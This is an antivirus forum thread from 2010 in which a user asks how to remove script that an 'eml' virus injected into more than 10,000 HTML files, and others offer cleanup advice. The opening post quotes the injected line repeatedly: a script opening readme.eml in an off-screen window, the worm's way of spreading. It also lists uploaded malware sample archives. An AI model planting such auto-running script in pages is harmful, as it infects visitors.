12   1  /  2  页   跳转

[求助] 怎么清楚eml病毒???

收藏
akax
头像
初生襁褓狮
  • 帖子:17
  • 注册: 2007-05-23
  • 来自:新疆和田
发表于: 2010-04-06 11:42 | 只看楼主 短消息 资料
字号: 1楼

怎么清楚eml病毒???

我的电脑上中了eml病毒。用瑞星杀毒以后把我所有的HTML网页一块儿删掉。 又用瑞星病毒隔壁区,所有文件恢复到原来的位置。 我看病毒在Html网页上加上了以下代码:

<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>



不只知道怎么清除10000多个网页中的这些代码??????

谁能帮我做一个清除这些代码?

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

附件附件:

文件名:病毒.rar
下载次数:384
文件类型:application/octet-stream
文件大小:
上传时间:2010-4-6 11:41:39
描述:rar

附件附件:

文件名:readme.rar
下载次数:360
文件类型:application/octet-stream
文件大小:
上传时间:2010-4-6 12:13:54
描述:rar

最后编辑akax 最后编辑于 2010-04-06 12:13:54
分享到:
gototop
 
jks_风
头像
锋芒艾服狮
  • 帖子:2235
  • 注册: 2009-12-17
  • 来自:China
论坛9周年纪念09欢乐圣诞10温馨圣诞世界杯勋章实习生小红花与爱同行
发表于: 2010-04-06 11:59 | 短消息 资料
字号: 2楼

回复:怎么清楚eml病毒???

恩,LZ你和我中的一样的病毒,重做系统后千万不要运行任何程序,使用资源管理器打开你的其他盘符,找到exe文件上传到杀毒网看看是不是被感染,如果被感染的话,只能把你的exe文件全部删掉了。

还有你在我的电脑搜索readme.eml然后全部删除,还有就是html的格式的也全部删除。

这个病毒好像是ChinaHack2的变种,还有就是不要贸然的插上U盘等移动设备,不然的话你的资料也可能会毁灭性的损失。

具体的不懂得还是论坛M我吧,我刚冲上次中招的阴影中摆脱出来。我尽量的挽救你吧
gototop
 
jks_风
头像
锋芒艾服狮
  • 帖子:2235
  • 注册: 2009-12-17
  • 来自:China
论坛9周年纪念09欢乐圣诞10温馨圣诞世界杯勋章实习生小红花与爱同行
发表于: 2010-04-06 12:01 | 短消息 资料
字号: 3楼

回复:怎么清楚eml病毒???

这个不是病毒,你把你的readme.eml发上来吧。

那个才是样本,我的前些天被杀软啥掉了,样本没有存活下来
gototop
 
akax
头像
初生襁褓狮
  • 帖子:17
  • 注册: 2007-05-23
  • 来自:新疆和田
发表于: 2010-04-06 12:04 | 只看楼主 短消息 资料
字号: 4楼

回复:怎么清楚eml病毒???

我已经重做系统了 。所有被感染的Exe文件铲除掉了 。 我的意思就是留下Html文件。Html文件千万不能清除的 。 我只需要用一个工具来把Html中的病毒代码清除掉。。哥们帮忙啊!!!!!!!
gototop
 
jks_风
头像
锋芒艾服狮
  • 帖子:2235
  • 注册: 2009-12-17
  • 来自:China
论坛9周年纪念09欢乐圣诞10温馨圣诞世界杯勋章实习生小红花与爱同行
发表于: 2010-04-06 12:09 | 短消息 资料
字号: 5楼

回复 4F akax 的帖子

我还真的没有这样的工具,我是用的在线收藏。

你是程序员还是怎么,html这么重要吗,那个不行的话,量不是很大的话就手动清除吧。要是没有eml的话,病毒是没法执行的
gototop
 
akax
头像
初生襁褓狮
  • 帖子:17
  • 注册: 2007-05-23
  • 来自:新疆和田
发表于: 2010-04-06 12:17 | 只看楼主 短消息 资料
字号: 6楼

回复:怎么清楚eml病毒???

readme.eml的样本给上传到附件里了。你看看  。 上次杀毒前压缩下来的  。

我现在只需要把10000多个网页Html中的那些垃圾代码清除掉 。这个需要一个程序员编辑一个小工具就行了  。嗨。。。倒霉哦 。
gototop
 
akax
头像
初生襁褓狮
  • 帖子:17
  • 注册: 2007-05-23
  • 来自:新疆和田
发表于: 2010-04-06 12:21 | 只看楼主 短消息 资料
字号: 7楼

回复:怎么清楚eml病毒???

局域网上用什么来阻止这些eml的传播啊  。。 我安装的是瑞星2010版。没有阻止上。 卡卡也是安装的  。 局域网的另外垃圾机子有这样的垃圾病毒  。
gototop
 
jks_风
头像
锋芒艾服狮
  • 帖子:2235
  • 注册: 2009-12-17
  • 来自:China
论坛9周年纪念09欢乐圣诞10温馨圣诞世界杯勋章实习生小红花与爱同行
发表于: 2010-04-06 12:22 | 短消息 资料
字号: 8楼

回复: 怎么清楚eml病毒???



引用:
原帖由 akax 于 2010-4-6 12:17:00 发表
readme.eml的样本给上传到附件里了。你看看  。 上次杀毒前压缩下来的  。

我现在只需要把10000多个网页Html中的那些垃圾代码清除掉 。这个需要一个程序员编辑一个小工具就行了  。嗨。。。倒霉哦 。


恩,我待会上传到瑞星官方,(但是这个瑞星已经可以查杀了吧)
额,应该有这样的小程序吧,我现在还没能力写哦


看来你的反病毒知识还是懂得很多哦,能手动的清除掉。去问问谷歌吧,可能会有哦
gototop
 
akax
头像
初生襁褓狮
  • 帖子:17
  • 注册: 2007-05-23
  • 来自:新疆和田
发表于: 2010-04-06 12:26 | 只看楼主 短消息 资料
字号: 9楼

回复:怎么清楚eml病毒???

瑞星能杀到。可是不要删掉我的网页哦  。其他Exe.文件删掉也是可以的  。

我是新疆用户,暂时不能访问谷歌进行搜索 。 我只能靠瑞星官方啊  。
gototop
 
超级游戏迷
头像
卡卡技术团队
  • 帖子:25779
  • 注册: 2007-01-14
  • 来自:
卡卡名人堂论坛9周年纪念瑞星金牌用户
发表于: 2010-04-06 13:01 | 短消息 资料
字号: 10楼

回复:怎么清楚eml病毒???

谁有iframkill这款网页代码批处理小工具的版友,请不吝上传下,我的找不到了……
打酱油的……
gototop
 
<<上一主题|下一主题>>
12   1  /  2  页   跳转
页面顶部
Powered by Discuz!NT